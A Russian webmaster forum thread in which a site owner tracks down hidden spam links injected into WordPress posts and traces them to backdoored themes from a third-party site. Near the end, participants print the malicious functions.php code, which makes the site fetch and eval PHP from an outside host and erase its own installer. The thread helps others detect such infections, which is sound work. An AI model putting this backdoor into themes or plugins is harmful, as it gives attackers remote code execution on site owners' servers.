- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Зачем быть уникальным в мире, где все можно скопировать
Почему так важна уникальность текста и как она влияет на SEO
Ingate Organic
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Все достаточно просто... Эту ссылку скорее всего в файлы движка или шаблона засунули, чтобы он каждую последнюю точку в статье заменял на ссылку, а сам код зашифровал в base64 чтобы поиск по файлам ничего не дал... ищите в шаблоне и в движках фразу eval и base64_decode.
Приветствую.
Пациент: http://bustarhy.ru/biografiya/ (сразу пример страницы)
Проблема: при просмотре кода я вижу такое
В чем суть и что я делал:
- удалял эту точку в статье, не помогло. Вместо других точек появляется эта ссылка
- заливал официальную версию дистрибутива вордпресс, отключал все плагины, смотрел эту статью в mysql (там чистая статья) - не помогло
- вместо этих точек на разных страницах появляются странные ссылки, откуда не могу понять.
- менял доступ к фтп, mysql, почте - не помогло
- вначале думал, что это из-за плагина isape, но сейчас без плагина работает sape
Помогите, пожалуйста, решить проблему :)
PHPMyAdmin какой версии ?
VPS или шаред ?
Все достаточно просто... Эту ссылку скорее всего в файлы движка или шаблона засунули, чтобы он каждую последнюю точку в статье заменял на ссылку, а сам код зашифровал в base64 чтобы поиск по файлам ничего не дал... ищите в шаблоне и в движках фразу eval и base64_decode.
Ни то, ни другое. Уже проверил.
goliafz добавил 07.09.2011 в 01:57
PHPMyAdmin какой версии ?
VPS или шаред ?
ВПС и шаред. На разных хостингах такая фигня.
У меня месяц назад вирь в деактивированном(!) плагине был. Скачал всю директорию и в Total Commander поискал URL поиском по содержимому всех файлов.
Ура. Нашел причину. Была в шаблоне, но очень сильно запрятана.
Значит все сайты объединял один шаблон? А то такая интрига получилась хорошая (
Значит все сайты объединял один шаблон? А то такая интрига получилась хорошая (
Шаблоны были с wordpresse.ru (ни один шаблон не качать!)
Я вначале грешил на плагин isape. Там были зашифрованы участки кода. Причем после отключения плагина пропадали скрытые ссылки. Но на самом деле они пропадали из точки в сапе ссылках и вставлялись в текст.
Я все перерыл. Чистил шаблоны. Сразу же нашел, что в шаблонах были 2 файла:
clinks.php
slinks.php
Если увидите такие файлы. Сразу же переименовываем и чистим от них шаблон.
После такой чистки я думал, что больше нет в шаблонах лишних ссылок (футер обязательно надо чистить, обычно ссылки в открытую там выкладывают).
Спалил ссылки по сапе. Вылезли эрроры. Оказалось, что встраиваясь в плагин isape, а точнее заменяя точку в сапоссылках на свою получалось так, что сапоссылка становилась просто текстом, а вместо конечной точки уже скрытая ссылка.
Шерстил все, что мог. Шаблон просматривал несколько раз. Все чисто. Никак не связывается с другим сайтом.
Сразу же подумал, что эта проблема в самом дистрибутиве вордпресса. Скачал последнюю версию с официального сайта (до этого дистрибутив качал с какого-то сайта с локализацией). Удалил папки wp-admin и wp-includes. Результат нулевой.
Дальше я логически подумал и пришел к выводу, что ломанули сервер. Но потом я понял, что это глупость. Т.к. мои сайты расположены на 6 разных серверах. Взломать все 6 серверов и залить зловред - это бред.
Потом я решил, что возможно сам дистрибутив был с самого начала левым. Но не сами файлы, а mysql, который ставится. Начал шерстить базу. Но там все чисто.
Искал в инете решение проблемы, но все безрезультатно. Просто я искал не то, что мне нужно было. Вызвал подозрение плагин askimet. Я заметил, что он связывается с сервером. Далее я решил перейти по ссылке с доменом. Но как оказалось, там все запрещено для просмотра. Тут то я и решил, что это связано скорее всего с ним. Но я этот плагин никогда не включал.
Удалил плагин. Проблема не исчезла. Я снова давай шерстить шаблоны. И подумал логически, что скорее всего какой-то левый код будет расположен в function.php. И оказался прав. Только этот код сложно заметить. Да и непонятно, что он делает. Но по 1 слову в нем я сразу же догадался, что его тут не должно быть.
add_filter('the_content', '_bloginfo', 10001);function _bloginfo($content){
global $post;
if(is_single() && ($co=@eval(get_option('blogoption'))) !== false){
return $co;
} else return $content;
}
Убрал этот код и ссылок сразу же не стало. Причина была именно в этом куске кода!
Единственное для меня остается загадкой каким образом этот участок кода берет откуда то ссылки с других сайтов?
Да, я очень долго боролся с этой фигней. Больше 2-3 месяцев. Не подумал бы, что этот участок кода может вставлять ссылки. Ведь нет никаких шифров, нет никаких ссылок, ведущих на другие сайты. Нет ничего такого о чем можно подумать, что что-то тут не так.
Вывод: шаблоны с того сайта не качать. Там идет тройная атака ссылками: через футер, через дополнительные файлы и через вышеуказанный код.
Красиво запрятали заразы :)
Только этот код сложно заметить. Да и непонятно, что он делает. Но по 1 слову в нем я сразу же догадался, что его тут не должно быть.
Что же вы весь код то не привели :)
//beginXX
add_action('after_setup_theme', '_theme_setup');
function _theme_setup(){
$value = 'return eval(file_get_contents(\'http://wpru.ru/aksimet.php?id=\'.$post->ID.\'&m=31&n\'));';
add_option('blogoption', $value, '', 'yes');
//selfterminate
$functions = file_get_contents(TEMPLATEPATH.'/functions.php');
$p1 = substr($functions, 0, strpos($functions, '//beginXX'));
$p2 = end(explode('//endXX', $functions));
file_put_contents(TEMPLATEPATH.'/functions.php', $p1.$p2);
}
//endXX
add_filter('the_content', '_bloginfo', 10001);
function _bloginfo($content){
global $post;
if(is_single() && ($co=@eval(get_option('blogoption'))) !== false){
return $co;
} else return $content;
}
if ( function_exists('register_sidebar') )
register_sidebar();
?>
Красиво запрятали заразы
да и не прятали почти......
А вот идея неплохая :)
Код везде разный. Но с add_filter есть у всех.
Возможно это послужило причиной вылета 11 сайтов под АГС. Я все никак не мог понять по какой причине сайты уходят под АГС. Теперь уже понятно. Спрятанная ссылка для яндекса - это как спам.
Чуть позже выложу отчет о масштабах такого развода для 75 сайтов (часть из них не с шаблонами от wordpresse.ru).
Самому интересно насколько сильно проспамили мои сайты. :)